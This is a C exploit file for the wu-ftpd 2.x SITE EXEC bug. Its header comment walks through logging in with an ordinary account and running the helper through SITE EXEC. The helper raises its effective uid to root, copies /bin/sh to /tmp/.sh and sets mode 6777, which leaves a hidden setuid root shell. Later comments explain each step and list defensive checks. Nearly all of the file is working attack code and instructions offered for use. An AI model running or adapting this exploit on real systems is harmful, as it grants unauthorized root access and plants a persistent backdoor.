/*
Exploit wu-ftp 2.x (site exec bug)

You need to have an account on the system running wu-ftpd

Compile this program in yer dir:
	cc -o ftpbug ftpbug.c

Login to the system:

220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) ready. 
Name (exploitablesys:root): goodaccount
331 Password required for goodaccount.
Password: (password)
230 User goodaccount logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote "site exec bash -c id"      (see if sys is exploitable)
200-bash -c id
200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users) groups=100(users)
200  (end of 'bash -c id')
ftp> quote "site exec bash -c /yer/home/dir/ftpbug"
200-bash -c /yer/home/dir/ftpbug
200  (end of 'bash -c /yer/home/dir/ftpbug')
ftp> quit
221 Goodbye.

Now you have a suid root shell in /tmp/.sh 
Have fun

StaTiC  (statik@free.org)

*/


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/*
 * Helper binary that the header transcript runs on the server through the
 * FTP daemon's SITE EXEC command.
 *
 * Takes no arguments and returns no explicit status. The results of
 * seteuid() and of both system() calls are ignored, so a failed step is
 * silent.
 *
 * Defender notes: the artifact left behind is a set-uid/set-gid copy of
 * /bin/sh at /tmp/.sh. Sweeping world-writable directories for set-id files
 * (e.g. `find /tmp -perm -4000`), mounting /tmp with nosuid, and restricting
 * or disabling SITE EXEC in the FTP daemon all address this class of issue.
 */
main()
{
   /* Raise the effective uid to root. This can only succeed while the process
      still holds root as its real or saved uid; the transcript in the file
      header shows uid=0 with euid=505 for commands run via SITE EXEC. */
   seteuid(0);
   /* Copy the system shell to a dot-file in /tmp. The copy is owned by the
      effective uid in force here (presumably root if the call above
      succeeded). */
   system("cp /bin/sh /tmp/.sh");
   /* Mode 6777 = set-uid and set-gid bits plus read/write/execute for
      everyone, so the copy runs with its owner's ids for any local user. */
   system("chmod 6777 /tmp/.sh");
}

